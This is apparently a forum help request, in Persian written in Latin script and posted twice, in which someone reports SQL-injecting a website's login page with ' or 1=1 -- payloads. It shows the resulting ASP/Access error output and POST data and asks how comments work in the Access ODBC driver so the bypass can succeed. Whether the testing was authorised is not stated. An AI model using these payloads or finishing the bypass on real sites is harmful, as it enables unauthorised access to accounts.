Ba salam:
Bad az test safe ye login yek site fahmidam ke dar moghabele sql injection asib pazir ast.
Data basi ke estefade mikonad Access mibashad.
man in code ra inject kardam :
' or 1=1 --
' or '1'=1' --
va ba payame zir movajeh shodam:
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services
--------------------------------------------------------------------------------
Technical Information (for support personnel)
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'TAC_ID = '' or 1=1 --' AND TAC_Attr = '[Global]Passwd''.
/asp/pass/login.asp, line 36
Browser Type:
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
Page:
POST 42 bytes to /asp/pass/login.asp
POST Data:
username=%27+or+1%3D1+--&password=&login=1
--------------------------
1:Mikhastam bebinam ke escape charecter dar ODBC Microsoft Access Driver che chiz mibashad?(-- kar nemikonad)
albate bad az inke syntax dorost ra vared mi****m (Yani tartib ' ha ra reayat mi****m ba payam access denied robero mishavim.)
2:Aya matalebe khobi dar morede sql injection soragh darid?
mer3000000000000
Bad az test safe ye login yek site fahmidam ke dar moghabele sql injection asib pazir ast.
Data basi ke estefade mikonad Access mibashad.
man in code ra inject kardam :
' or 1=1 --
' or '1'=1' --
va ba payame zir movajeh shodam:
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services
--------------------------------------------------------------------------------
Technical Information (for support personnel)
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'TAC_ID = '' or 1=1 --' AND TAC_Attr = '[Global]Passwd''.
/asp/pass/login.asp, line 36
Browser Type:
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
Page:
POST 42 bytes to /asp/pass/login.asp
POST Data:
username=%27+or+1%3D1+--&password=&login=1
--------------------------
1:Mikhastam bebinam ke escape charecter dar ODBC Microsoft Access Driver che chiz mibashad?(-- kar nemikonad)
albate bad az inke syntax dorost ra vared mi****m (Yani tartib ' ha ra reayat mi****m ba payam access denied robero mishavim.)
2:Aya matalebe khobi dar morede sql injection soragh darid?
mer3000000000000
Comment